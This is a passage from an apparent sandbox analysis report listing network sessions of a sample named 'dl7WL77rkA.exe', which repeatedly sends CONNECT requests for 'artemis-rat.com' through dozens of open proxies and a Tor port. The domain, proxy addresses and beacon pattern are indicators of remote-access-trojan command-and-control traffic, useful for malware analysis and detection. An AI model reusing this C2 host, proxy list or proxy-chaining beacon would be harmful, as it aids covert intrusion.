                                                                                                                                                                                                                                                            960192.168.2.552652162.159.242.8803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.527308941 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.688744068 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            961192.168.2.552669104.16.241.204803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.540431023 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.694704056 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            962192.168.2.552674185.162.228.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.541026115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.695338011 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            963192.168.2.552623162.214.90.49587403876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.545202017 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.107958078 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.806381941 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.939476967 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:46.124543905 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.311537027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468369007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905148983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.514471054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            964192.168.2.552691104.18.81.76803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.546873093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.701215029 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            965192.168.2.55260967.43.236.20256333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.548007965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            966192.168.2.55255113.234.24.11631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.553086042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.940310955 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            967192.168.2.552675162.240.22.184480263876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.568866968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            968192.168.2.55259572.206.181.105649353876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.573025942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            969192.168.2.552607174.77.111.198495473876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586534023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            970192.168.2.550311171.244.140.160560763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586539030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.592586994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.592943907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            971192.168.2.55219669.61.200.104361813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.586622000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            972192.168.2.55267238.162.30.19731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.589656115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.036452055 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
973 | 192.168.2.5 | 52702 | 23.95.209.142 | 15673 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.589677095 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
974 | 192.168.2.5 | 52560 | 201.243.82.157 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.590959072 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.514287949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.939320087 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.121642113 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:30:53.299580097 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
975 | 192.168.2.5 | 52594 | 51.158.98.197 | 16379 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.598263025 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.404824018 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:43.355422974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.108408928 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.608460903 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.217679024 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:55.717684031 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.791243076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.927840948 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
Mar 11, 2024 03:31:08.069421053 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
Mar 11, 2024 03:31:14.213310957 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
Mar 11, 2024 03:31:26.245313883 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
Mar 11, 2024 03:31:50.565409899 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi
Mar 11, 2024 03:32:39.717700005 CET | 536 | IN | HTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
976 | 192.168.2.5 | 52587 | 196.20.125.149 | 8083 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.601233959 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
977 | 192.168.2.5 | 52125 | 107.180.88.41 | 58037 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.615704060 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.701805115 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
978 | 192.168.2.5 | 52591 | 91.189.177.190 | 3128 | 3876 | C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:41.619033098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.950541019 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
